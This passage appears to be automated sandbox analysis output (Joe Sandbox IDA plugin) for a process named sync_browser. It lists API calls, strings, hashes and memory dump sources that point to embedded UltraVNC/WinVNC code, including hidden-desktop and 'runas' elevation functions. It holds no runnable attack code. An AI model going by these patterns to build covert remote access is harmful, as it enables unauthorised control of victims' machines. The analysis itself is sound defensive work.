                                                                    • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF6DC0CA7AC
                                                                    • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF6DC0CA726
                                                                    • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF6DC0CA738
                                                                    • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6DC0CA7E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                                    • API String ID: 2777246624-2146332292
                                                                    • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                    • Instruction ID: be562dea8b8c9d708e8f6f9fa88141fa2e136efc1d7ce55cf9cb1f214792136e
                                                                    • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                    • Instruction Fuzzy Hash: 24418135E1869A8AE724CF50E9406AD7364FB84748F500237DA8EC7A58DF3DE567C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileInfoLastSizeVersion
                                                                    • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                    • API String ID: 752140088-134519983
                                                                    • Opcode ID: 090d12dc5aa2e90c36e1021850def166bee45461e9230a84e46210d1a437b15e
                                                                    • Instruction ID: 2f6e3fb0409ddd836cffb6d95fe809eafa85ea4ae196cca80a37ddf331f2a0d6
                                                                    • Opcode Fuzzy Hash: 090d12dc5aa2e90c36e1021850def166bee45461e9230a84e46210d1a437b15e
                                                                    • Instruction Fuzzy Hash: 0721F861F0965E81EA049B62AC002ED63A4FF85BD5F440032DE4D87B58EF7CD5A7CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                    • String ID:
                                                                    • API String ID: 3646291181-0
                                                                    • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction ID: 255a8fc6e8421e8c8ce6a3e6589cab2a0f3385384c7956e9664f685a21ee947f
                                                                    • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction Fuzzy Hash: 8C51CE62E086AACAFB109F24DC4076D2698EB45BA4F444633EA1D877C6DF3CE4679700
                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF6DC17AD95
                                                                      • Part of subcall function 00007FF6DC1877D0: _amsg_exit.LIBCMT ref: 00007FF6DC1877FA
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17ADC8
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17ADE6
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE26
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE40
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF6DC17AF59,?,?,00000000,00007FF6DC1877FF), ref: 00007FF6DC17AE50
                                                                    • _initterm.LIBCMT ref: 00007FF6DC17AE90
                                                                    • _initterm.LIBCMT ref: 00007FF6DC17AEA3
                                                                    • ExitProcess.KERNEL32 ref: 00007FF6DC17AEDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                    • String ID:
                                                                    • API String ID: 3873167975-0
                                                                    • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction ID: e20b36d20ba36123348266e99702ef0b365b3213d599d9d8b1e65849acf07b70
                                                                    • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction Fuzzy Hash: 89418D21A1DA6AC2F6109B15EC4023D7298BF88B94F241037E94DC3BA5EF3CE47B8700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                    • String ID:
                                                                    • API String ID: 4242051881-0
                                                                    • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction ID: d646e3c3e0c71f36a8065bb1a7d66c840fba97979e4adff87ebb26575f356a4e
                                                                    • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction Fuzzy Hash: 3211BE25A06A1A85EF589F65ED5437C3368FF85F59F040032C91E82668CF2DD467CB41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 186452611-3977938048
                                                                    • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction ID: 0c246b6c31fe8827acb78be1412ca12024931996fdec6630bac35f2d11637bc9
                                                                    • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction Fuzzy Hash: ECA1E222A086D585FB50CB65C8587FE2BA9EB85B44F194137CA4CC77A5CF3EE466CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                    • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                    • API String ID: 3897446562-3886131270
                                                                    • Opcode ID: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction ID: 9acb818ab9eac09f5fcd20581fa2aee7471054819e9f9d3e7f6ae190c38fb8ce
                                                                    • Opcode Fuzzy Hash: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction Fuzzy Hash: 5681AF22A08B9998EB10CB74D8003ED37A4FB457A4F504333EA7D83AD9DF69D51AC700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 335284197-192647395
                                                                    • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction ID: b27c6d93e8c1125d37aa0147470b9b3d8b15c517df6256cd72977136d37d6c12
                                                                    • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction Fuzzy Hash: 66311A31E0CA8686FA709B11F85537E73A4FBD4704F840036E69EC2A95EF6DE4678B40
                                                                    APIs
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F0113
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F0140
                                                                    • GetDeviceCaps.GDI32 ref: 00007FF6DC0F016D
                                                                      • Part of subcall function 00007FF6DC0CA040: OpenInputDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA07A
                                                                      • Part of subcall function 00007FF6DC0CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC0CA083
                                                                      • Part of subcall function 00007FF6DC0CA040: GetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA08B
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0A6
                                                                      • Part of subcall function 00007FF6DC0CA040: MessageBoxA.USER32 ref: 00007FF6DC0CA0B7
                                                                      • Part of subcall function 00007FF6DC0CA040: SetThreadDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0C2
                                                                      • Part of subcall function 00007FF6DC0CA040: CloseDesktop.USER32(?,?,?,00007FF6DC0C82D7), ref: 00007FF6DC0CA0CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                    • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                    • API String ID: 3271485511-23260621
                                                                    • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                    • Instruction ID: cde27cce1626de4249fb842a8a9fc5c8f7e533d02a52f1171b286b26743dc336
                                                                    • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                    • Instruction Fuzzy Hash: 78219C726185DA85EB008FB5C8107EC2765EB98B08F484437CE4CCA6A9DE7CE1A7C331
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                    • String ID: -softwarecad$p$runas
                                                                    • API String ID: 397093096-2208381721
                                                                    • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction ID: b4198d1bb480ffb3d0290b10e1700d8863a49bb21ef67f7434a55f5dc0ec22eb
                                                                    • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction Fuzzy Hash: 6D11BA35518B95C5E7709B50F89939EB3A8FB88744F800236D69D42B94DF7CD16ACB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                    • String ID:
                                                                    • API String ID: 113790786-0
                                                                    • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                    • Instruction ID: 1fbae02904d94ade5958b7420fdc933bb1a428092d63d238a862eefa40246981
                                                                    • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                    • Instruction Fuzzy Hash: F9216D21E1D62A91FA51AB50EC08B7E629CAF41780F544537F50EC76C1CF3CE462EB90
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC1837C4: GetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837CE
                                                                      • Part of subcall function 00007FF6DC1837C4: FlsGetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837DC
                                                                      • Part of subcall function 00007FF6DC1837C4: FlsSetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183808
                                                                      • Part of subcall function 00007FF6DC1837C4: GetCurrentThreadId.KERNEL32 ref: 00007FF6DC18381C
                                                                      • Part of subcall function 00007FF6DC1837C4: SetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183834
                                                                      • Part of subcall function 00007FF6DC1832EC: Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    • _errno.LIBCMT ref: 00007FF6DC189D9C
                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC189DA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
